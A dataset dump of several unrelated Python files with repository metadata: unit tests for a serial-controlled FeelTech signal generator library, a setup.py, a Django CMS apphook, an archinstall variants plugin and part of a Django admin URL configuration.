'WFD90.0\n',
self.output.getvalue())
def test_duty_cycle_already_set(self):
"""Sets the duty cycle to an already-set value."""
fs = FakeSerial([b'10500\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, duty_cycle=0.105)
self.assertEqual('RMD\n', fs.getvalue())
def test_duty_cycle_too_low(self):
"""Tries to set the duty cycle to zero."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=0)
def test_duty_cycle_too_high(self):
"""Tries to set the duty cycle to one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=1)
def test_offset_volts(self):
"""Sets the offset voltage on both channels."""
self.fy.set(offset_volts=1.5)
self.fy.set(channel=1, offset_volts=-1.6)
self.assertEqual(
'WMO1.50\n'
'WFO-1.60\n',
self.output.getvalue())
def test_offset_volts_already_set(self):
"""Tries to set the offset voltage to a value already set."""
fs = FakeSerial([b'12340\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, offset_volts=12.34)
self.assertEqual('RMO\n', fs.getvalue())
def test_offset_volts_too_low(self):
"""Tries to set the offset voltage too low."""
fy = fygen.FYGen(port=self.output, min_volts=-1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=-1.6)
def test_offset_volts_too_high(self):
"""Tries to set the offset voltage too high."""
fy = fygen.FYGen(port=self.output, max_volts=1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=1.6)
def test_phase(self):
"""Sets the phase on both channels."""
self.fy.set(phase_degrees=10)
self.fy.set(channel=1, phase_degrees=380.3)
self.assertEqual(
'WMP10.000\n'
'WFP20.300\n',
self.output.getvalue())
def test_phase_already_set(self):
"""Tries to set the phase to an already-set value."""
fs = FakeSerial([b'189300\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, phase_degrees=189.3)
self.assertEqual('RMP\n', fs.getvalue())
def test_set_modulation(self):
"""Tries every known combination of modulatin and trigger."""
self.fy.set_modulation(mode=fygen.MODULATION_FSK)
self.fy.set_modulation(mode=fygen.MODULATION_ASK)
self.fy.set_modulation(mode=fygen.MODULATION_PSK)
self.fy.set_modulation(mode=fygen.MODULATION_BURST)
self.fy.set_modulation(mode=fygen.MODULATION_AM)
self.fy.set_modulation(mode=fygen.MODULATION_FM)
self.fy.set_modulation(mode=fygen.MODULATION_PM)
self.fy.set_modulation(trigger=fygen.TRIGGER_CH2)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_AC)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_IN)
self.fy.set_modulation(trigger=fygen.TRIGGER_MANUAL)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_DC)
self.fy.set_modulation(burst_count=76)
self.fy.set_modulation(am_attenuation=0.121)
self.fy.set_modulation(pm_bias_degrees=23.4)
self.fy.set_modulation(hop_freq_hz=1234)
self.fy.set_modulation(hop_freq_uhz=1234)
self.fy.set_modulation(fm_bias_freq_hz=1234)
self.fy.set_modulation(fm_bias_freq_uhz=1234)
self.assertEqual(
'WPF0\n'
'WPF1\n'
'WPF2\n'
'WPF3\n'
'WPF4\n'
'WPF5\n'
'WPF6\n'
'WPM0\n'
'WPM1\n'
'WPM1\n'
'WPM2\n'
'WPM3\n'
'WPN76\n'
'WPR12.1\n'
'WPP23.4\n'
'WFK00001234000000\n'
'WFK00000000001234\n'
'WFM00001234000000\n'
'WFM00000000001234\n',
self.output.getvalue())
def test_invalid_modulation_mode(self):
"""Tries to set invalid modulation modes."""
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=-1)
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=7)
def test_invalid_burst_cycle_count(self):
"""Tries to set an invalid burst cycle count."""
with self.assertRaises(fygen.InvalidBurstCycleCountError):
self.fy.set_modulation(burst_count=0)
def test_invalid_trigger_mode(self):
"""Tries to set invalid trigger modes."""
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=-1)
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=4)
def test_invalid_am_attenuation(self):
"""Tries to set an invalid rate percentage."""
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=-0.1)
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=2.1)
def test_invalid_hop_frequency(self):
"""Tries to set an invalid hop frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=1, hop_freq_uhz=1)
def test_invalid_fm_bias_frequency(self):
"""Tries to set an invalid fm bias frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=1, fm_bias_freq_uhz=1)
def test_get_enable(self):
"""Gets the current enable status."""
fs = FakeSerial([b'255\n', b'0\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(True, fy.get(0, 'enable'))
self.assertEqual(False, fy.get(1, 'enable'))
self.assertEqual('RMN\nRFN\n', fs.getvalue())
def test_get(self):
"""Calls get with no arguments."""
fs = FakeSerial([
b'50000\n', # duty cycle
b'255\n', # enable
b'12345.6789\n', # freq hz
b'12340\n', # offset volts
b'189300\n', # phase degrees
b'123400\n', # volts
b'4\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': 0.5,
'enable': True,
'freq_hz': 12345,
'offset_volts': 12.34,
'phase_degrees': 189.3,
'volts': 12.34,
'wave': 'dc',
}, fy.get())
self.assertEqual(
'RMD\n'
'RMN\n'
'RMF\n'
'RMO\n'
'RMP\n'
'RMA\n'
'RMW\n'
'',
fs.getvalue())
def test_get_wave(self):
"""Gets the current wave."""
fs = FakeSerial([b'4\n', b'4\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('dc', fy.get(0, 'wave'))
self.assertEqual({'wave': 'tri'}, fy.get(1, ('wave',)))
self.assertEqual('RMW\nRFW\n', fs.getvalue())
def test_get_invalid_channel(self):
"""Tries to pass an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.get(2, 'wave')
def test_get_invalid_parameter(self):
"""Tries to pass an invalid parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get(0, 'foo')
def test_get_invalid_waveform_index(self):
"""Unrecognized wave index is returned by the siggen."""
fs = FakeSerial([b'100\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.UnknownWaveformError):
fy.get(0, 'wave')
def test_get_freq1(self):
"""Gets the frequency in Hz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12345, fy.get(0, 'freq_hz'))
self.assertEqual('RMF\n', fs.getvalue())
def test_get_freq2(self):
"""Gets the frequency in uHz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12345678900, fy.get(1, 'freq_uhz'))
self.assertEqual('RFF\n', fs.getvalue())
def test_get_volts(self):
"""Gets the amplitude voltage."""
fs = FakeSerial([b'123400\n', b'5000\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'volts'))
self.assertEqual(0.5, fy.get(1, 'volts'))
self.assertEqual('RMA\nRFA\n', fs.getvalue())
def test_get_offset_volts(self):
"""Gets the offset voltage."""
fs = FakeSerial([b'12340\n', b'4294962296\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'offset_volts'))
self.assertEqual(-5, fy.get(1, 'offset_volts'))
self.assertEqual('RMO\nRFO\n', fs.getvalue())
def test_get_phase_degrees(self):
"""Gets the phase angle."""
fs = FakeSerial([b'0\n', b'189300\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0, fy.get(0, 'phase_degrees'))
self.assertEqual(189.3, fy.get(1, 'phase_degrees'))
self.assertEqual('RMP\nRFP\n', fs.getvalue())
def test_get_duty_cycle(self):
"""Gets the duty cycle."""
fs = FakeSerial([b'50000\n', b'10500\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0.5, fy.get(0, 'duty_cycle'))
self.assertEqual(0.105, fy.get(1, 'duty_cycle'))
self.assertEqual('RMD\nRFD\n', fs.getvalue())
def test_set_waveform(self):
"""Sets a custom waveform."""
wave = [-1.0, 0.0, 1.0, 0.0] * 2048
self.fy.set_waveform(5, values=wave)
expected = 'DDS_WAVE5\n'
expected += '00000020FF3F002000000020FF3F0020\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_set_raw_waveform(self):
"""Sets a custom waveform using raw values."""
wave = [1, 2, 3, 4] * 2048
self.fy.set_waveform(6, raw_values=wave)
expected = 'DDS_WAVE6\n'
expected += '01000200030004000100020003000400\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_bad_waveform_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set_waveform(0, raw_values=[0]*8192)
def test_raw_value_conflict_error(self):
"""Passes both values and raw_values."""
with self.assertRaises(fygen.RawValueConflictError):
self.fy.set_waveform(1, values=[0.0] * 8192, raw_values=[0]*8192)
def test_value_count_error(self):
"""Passes the wrong array size."""
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, raw_values=[0]*8191)
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, values=[0.0]*8191)
def test_cmd_noack_error(self):
"""Simulates the siggen not responsing to the DDR_WAVE request."""
fs = FakeSerial([b'0\n', b'0\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_data_noack_error(self):
"""Simulates the siggen not responsing to data sent."""
fs = FakeSerial([b'0\n', b'0\n', b'W\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_set_sweep(self):
"""Tries every known sweep variable."""
self.fy.set_sweep(enable=False, mode=fygen.SWEEP_FREQUENCY)
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE)
self.fy.set_sweep(mode=fygen.SWEEP_OFFSET)
self.fy.set_sweep(mode=fygen.SWEEP_DUTY_CYCLE)
self.fy.set_sweep(log_sweep=False)
self.fy.set_sweep(log_sweep=True)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_TIME)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN)
self.fy.set_sweep(time_seconds=10.1)
self.fy.set_sweep(start_freq_hz=1234.56, end_freq_hz=1234.56)
self.fy.set_sweep(start_volts=12.3456, end_volts=12.3456)
self.fy.set_sweep(start_offset_volts=-12.3456, end_offset_volts=-12.3456)
self.fy.set_sweep(start_duty_cycle=0.1, end_duty_cycle=0.9)
self.assertEqual(
'SBE0\n'
'SOB0\n'
'SBE0\n'
'SOB1\n'
'SBE0\n'
'SOB2\n'
'SBE0\n'
'SOB3\n'
'SBE0\n'
'SMO0\n'
'SBE0\n'
'SMO1\n'
'SBE0\n'
'SXY0\n'
'SBE0\n'
'SXY1\n'
'SBE0\n'
'STI10.10\n'
'SBE0\n'
'SST1234.6\n'
'SEN1234.6\n'
'SBE0\n'
'SST12.346\n'
'SEN12.346\n'
'SBE0\n'
'SST-2.346\n'
'SEN-2.346\n'
'SBE0\n'
'SST10.0\n'
'SEN90.0\n'
'',
self.output.getvalue())
def test_sweep_enable(self):
"""Tries to enable sweep mode."""
with self.assertRaises(fygen.PossibleFirmwareBugError):
self.fy.set_sweep(enable=True)
def test_sweep_enable_forced(self):
"""Tries to enable sweep mode."""
fy = fygen.FYGen(port=self.output)
fy.force_sweep_enable = True
fy.set_sweep(enable=True)
self.assertEqual('SBE1\n', self.output.getvalue())
def test_invalid_sweep_mode(self):
"""Sets an invalid sweep mode."""
with self.assertRaises(fygen.InvalidSweepModeError):
self.fy.set_sweep(mode=5)
def test_invalid_sweep_source(self):
"""Sets an invalid sweep source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=2)
def test_sweep_vco_with_time(self):
"""Sets a time with a VCO source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN, time_seconds=1)
def test_invalid_sweep_time(self):
"""Sets an invalid sweep time."""
with self.assertRaises(fygen.InvalidSweepTimeError):
self.fy.set_sweep(time_seconds=0)
def test_sweep_start_freq_in_invalid_mode(self):
"""Sets start_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, start_freq_hz=1000)
def test_invalid_start_freq(self):
"""Sets start_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(start_freq_hz=0)
def test_sweep_end_freq_in_invalid_mode(self):
"""Sets end_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, end_freq_hz=1000)
def test_invalid_end_freq(self):
"""Sets end_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(end_freq_hz=0)
def test_sweep_start_volts_in_invalid_mode(self):
"""Sets start_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_volts=10)
def test_invalid_start_volts(self):
"""Sets start_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=30)
def test_sweep_end_volts_in_invalid_mode(self):
"""Sets end_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_volts=10)
def test_invalid_end_volts(self):
"""Sets end_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=30)
def test_sweep_start_offset_volts_in_invalid_mode(self):
"""Sets start_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_offset_volts=10)
def test_invalid_start_offset_volts(self):
"""Sets start_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_offset_volts=30)
def test_sweep_end_offset_volts_in_invalid_mode(self):
"""Sets end_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_offset_volts=10)
def test_invalid_end_offset_volts(self):
"""Sets end_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_offset_volts=30)
def test_sweep_start_duty_cycle_in_invalid_mode(self):
"""Sets start_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_duty_cycle=0.1)
def test_invalid_start_duty_cycle(self):
"""Sets start_duty_cycle to zero and too high."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=1)
def test_sweep_end_duty_cycle_in_invalid_mode(self):
"""Sets end_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_duty_cycle=0.9)
def test_invalid_end_duty_cycle(self):
"""Sets end_duty_cycle to zero and one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=1)
def test_set_measurement(self):
"""Tests all combinations of set_measurement."""
self.fy.set_measurement(reset_counter=True)
self.fy.set_measurement(pause=False)
self.fy.set_measurement(pause=True)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_1S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_10S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_100S)
self.fy.set_measurement(coupling=fygen.COUPLING_DC)
self.fy.set_measurement(coupling=fygen.COUPLING_AC)
self.assertEqual(
'WCZ0\n'
'WCP1\n'
'WCP0\n'
'WCG0\n'
'WCG1\n'
'WCG2\n'
'WCC1\n'
'WCC0\n',
self.output.getvalue())
def test_set_measurement_invalid_gate_time(self):
"""Passes an invalid gate_time."""
with self.assertRaises(fygen.InvalidGateTimeError):
self.fy.set_measurement(gate_time=4)
def test_set_measurement_invalid_coupling(self):
"""Passes an invalid coupling."""
with self.assertRaises(fygen.InvalidCouplingError):
self.fy.set_measurement(coupling=2)
def test_get_measurement(self):
"""Gets all measurements."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'0000060668\n', # period_sec
b'0000012345\n', # positive_width_sec
b'0000054321\n', # negative_width_sec
b'0000000541\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{
'freq_hz': 668.0,
'period_sec': 6.0668e-5,
'positive_width_sec': 1.2345e-5,
'negative_width_sec': 5.4321e-5,
'duty_cycle': 0.541
},
fy.get_measurement())
def test_get_measurement_counter(self):
"""Gets the counter measurement."""
fs = FakeSerial([
b'0000000669\n', # counter
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'counter': 669}, fy.get_measurement({'counter'}))
def test_get_measurement_frequency(self):
"""Gets frequencies."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'1\n', # gate mode = 10S
b'0000000668\n', # freq_hz
b'2\n', # gate mode = 100S
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(668.0, fy.get_measurement('freq_hz'))
self.assertEqual(66.8, fy.get_measurement('freq_hz'))
self.assertEqual(6.68, fy.get_measurement('freq_hz'))
def test_get_measurement_invalid_gate_time(self):
"""siggen returns an unexpected gate time mode."""
fs = FakeSerial([
b'x\n', # gate mode = ???
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.InvalidGateTimeError):
fy.get_measurement('freq_hz')
def test_get_measurement_unknown_parameter(self):
"""requests an unknown parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get_measurement('foo')
def test_save(self):
"""Saves parameters."""
self.fy.save(2)
self.assertEqual('USN02\n', self.output.getvalue())
def test_load(self):
"""Loads parameters."""
self.fy.load(3)
self.assertEqual('ULN03\n', self.output.getvalue())
def test_set_synchronization(self):
"""Sets all known sync modes."""
self.fy.set_synchronization(wave=True)
self.fy.set_synchronization(freq=True)
self.fy.set_synchronization(volts=True)
self.fy.set_synchronization(offset_volts=True)
self.fy.set_synchronization(duty_cycle=True)
self.assertEqual(
'USA0\n'
'USA1\n'
'USA2\n'
'USA3\n'
'USA4\n'
'',
self.output.getvalue())
def test_get_synchronization(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # duty cycle
b'255\n', # freq
b'0\n', # offset_volts
b'255\n', # volts
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': False,
'freq': True,
'offset_volts': False,
'volts': True,
'wave': False,
}, fy.get_synchronization())
self.assertEqual(
'RSA4\n'
'RSA1\n'
'RSA3\n'
'RSA2\n'
'RSA0\n'
'',
fs.getvalue())
def test_get_synchronization_dict(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'255\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{'duty_cycle': True},
fy.get_synchronization(('duty_cycle',)))
self.assertEqual('RSA4\n', fs.getvalue())
def test_get_synchronization_single(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(False, fy.get_synchronization('wave'))
self.assertEqual('RSA0\n', fs.getvalue())
def test_get_invalid_sync_mode(self):
"""Gets an invalid sync mode."""
with self.assertRaises(fygen.InvalidSynchronizationMode):
self.fy.get_synchronization('foo')
def test_set_buzzer(self):
"""Sets the buzzer."""
self.fy.set_buzzer(False)
self.fy.set_buzzer(True)
self.assertEqual('UBZ0\nUBZ1\n', self.output.getvalue())
def test_get_buzzer(self):
"""Gets buzzer state."""
fs = FakeSerial([
b'0\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertFalse(fy.get_buzzer())
self.assertTrue(fy.get_buzzer())
self.assertEqual('RBZ\nRBZ\n', fs.getvalue())
def test_set_uplink(self):
"""Tries all setuplink combinations."""
self.fy.set_uplink(is_master=True, enable=False)
self.fy.set_uplink(is_master=False, enable=True)
self.assertEqual(
'UUL0\n'
'UMS0\n'
'UMS1\n'
'UUL1\n'
'',
self.output.getvalue())
def test_get_uplink(self):
"""Gets uplink settings."""
fs = FakeSerial([
b'0\n',
b'255\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'enable': False, 'is_master': False}, fy.get_uplink())
self.assertTrue(fy.get_uplink('enable'))
self.assertEqual('RUL\nRMS\nRUL\n', fs.getvalue())
def test_get_id(self):
"""Gets device id."""
fs = FakeSerial([b'12345\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('12345', fy.get_id())
self.assertEqual('UID\n', fs.getvalue())
def test_get_model(self):
"""Gets device model."""
fs = FakeSerial([b'fy2300\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('fy2300', fy.get_model())
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect_on_init(self):
"""Autodetects runs on FYGen init"""
fs = FakeSerial([b'FY6900-60\n',])
fy = fygen.FYGen(port=fs, _port_is_serial=True)
self.assertEqual('fy6900', fy.device_name)
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect(self):
self.assertEqual(fygen.detect_device('FY6900-60M'), 'fy6900')
self.assertEqual(fygen.detect_device('FY2350H'), 'fy2300')
def test_autodetect_no_conflict(self):
"""
Make sure no exact match maps to the wrong device.
This is just to future proof in case two devices with
leading 4-char prefix gets added that have different waveform id's
"""
for device in SUPPORTED_DEVICES:
self.assertEqual(fygen.detect_device(device), device)
if __name__ == '__main__':
unittest.main()
| 31.905023 | 81 | 0.642317 | 34,626 | 0.991127 | 0 | 0 | 0 | 0 | 0 | 0 | 8,197 | 0.234629 |
a4f8e8179ce401a6630d257843d17f4bc8c551d3 | 212 | py | Python | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | 3 | 2020-06-28T15:47:02.000Z | 2021-02-14T19:25:13.000Z | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | null | null | null | setup.py | hainegroup/Polar-overturning-circulation-model | 8cd67271b038d09ce29492c3d201a24698d2e970 | [
"MIT"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='POC model for publication',
author='Thomas Haine',
license='MIT',
)
| 19.272727 | 44 | 0.665094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 58 | 0.273585 |
a4fa0f6854a007037641edd2c76faef321c93748 | 413 | py | Python | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 1 | 2019-02-04T02:11:32.000Z | 2019-02-04T02:11:32.000Z | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 2 | 2019-03-26T22:37:49.000Z | 2019-12-02T15:39:35.000Z | danceschool/stats/cms_apps.py | benjwrdill/django-danceschool | 9ecb2754502e62d0f49aa23d08ca6de6cae3c99a | [
"BSD-3-Clause"
] | 1 | 2019-03-19T22:49:01.000Z | 2019-03-19T22:49:01.000Z | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class StatsApphook(CMSApp):
name = _("Stats Apphook")
def get_urls(self, page=None, language=None, **kwargs):
return ["danceschool.stats.urls"] # replace this with the path to your application's URLs module
apphook_pool.register(StatsApphook)
| 29.5 | 111 | 0.728814 | 234 | 0.566586 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.246973 |
a4facbc09faf96725436ab1390e2089d932160c8 | 2,577 | py | Python | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
] | 3 | 2021-06-08T16:01:23.000Z | 2021-11-14T00:49:36.000Z | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
] | null | null | null | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
] | null | null | null | import logging
import archinstall
__version__ = 0.1
class Plugin:
VARIANTS_DICT_KEY = "variants"
VARIANT_KEY = "variant"
def __init__(self):
if self.has_variants() and self.variants_is_dict():
variant_key = self.get_selected_variant_key()
variant = archinstall.arguments[self.VARIANTS_DICT_KEY][variant_key]
self.apply_variant(variant)
self.clean_arguments()
archinstall.log(
f"The '{ variant_key }' variant was applied to the arguments.",
level=logging.INFO
)
archinstall.log(
"New arguments: " + archinstall.arguments.__str__(),
level=logging.DEBUG
)
def variants_is_dict(self) -> bool:
return isinstance(self.get_variants(), dict)
def has_variant_argument(self) -> bool:
return self.VARIANT_KEY in archinstall.arguments and \
isinstance(self.get_variant_argument(), str)
def get_variant_argument(self) -> str:
return archinstall.arguments[self.VARIANT_KEY]
def variant_argument_in_variants(self) -> bool:
return self.get_variant_argument() in self.get_variants()
def get_variants(self) -> dict:
return archinstall.arguments[self.VARIANTS_DICT_KEY]
def has_variants(self) -> bool:
return self.VARIANTS_DICT_KEY in archinstall.arguments
def variant_exists(self, variant: str) -> bool:
return variant in self.get_variants()
def get_selected_variant_key(self) -> str:
options = list(self.get_variants().keys())
if self.has_variant_argument() and self.variant_argument_in_variants():
return self.get_variant_argument()
if len(options) > 1:
return archinstall.generic_select(
options,
f"Select which variant you want to install (default: {options[0]}):",
True
) or options[0]
return options[0]
def apply_variant(self, variant: dict):
for option in variant:
if option in archinstall.arguments:
if isinstance(archinstall.arguments[option], list):
archinstall.arguments[option] += variant[option]
continue
self.overwrite(option, variant[option])
def clean_arguments(self):
del archinstall.arguments[self.VARIANTS_DICT_KEY]
del archinstall.arguments[self.VARIANT_KEY]
def overwrite(self, key: str, value):
archinstall.arguments[key] = value
| 32.620253 | 85 | 0.631354 | 2,520 | 0.977881 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.064416 |
a4fdbb92ca1d67c1847d8902e458cfee14e5b0d4 | 1,316 | py | Python | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 2 | 2019-10-17T02:40:12.000Z | 2019-10-17T22:51:36.000Z | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 1 | 2019-10-02T20:23:12.000Z | 2019-10-02T20:23:12.000Z | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 4 | 2019-08-20T21:16:04.000Z | 2021-07-01T03:08:10.000Z | from django.urls import path
from declaracion.views import (BusquedaDeclarantesFormView, InfoDeclarantesFormView, InfoDeclaracionFormView,
BusquedaDeclaracionesFormView, BusquedaUsuariosFormView, NuevoUsuariosFormView,
EliminarUsuarioFormView,InfoUsuarioFormView,EditarUsuarioFormView)
urlpatterns = [
path('busqueda-declarantes', BusquedaDeclarantesFormView.as_view(),
name='busqueda-declarantes'),
path('busqueda-declaraciones', BusquedaDeclaracionesFormView.as_view(),
name='busqueda-declaraciones'),
path('busqueda-usuarios', BusquedaUsuariosFormView.as_view(),
name='busqueda-usuarios'),
path('info-declarante/<int:pk>/', InfoDeclarantesFormView.as_view(),
name='info-declarante'),
path('info-usuario/<int:pk>/', InfoUsuarioFormView.as_view(),
name='info-usuario'),
path('eliminar-usuario/<int:pk>/', EliminarUsuarioFormView.as_view(),
name='eliminar-usuario'),
path('editar-usuario/<int:pk>/', EditarUsuarioFormView.as_view(),
name='editar-usuario'),
path('nuevo-usuario', NuevoUsuariosFormView.as_view(),
name='nuevo-usuario'),
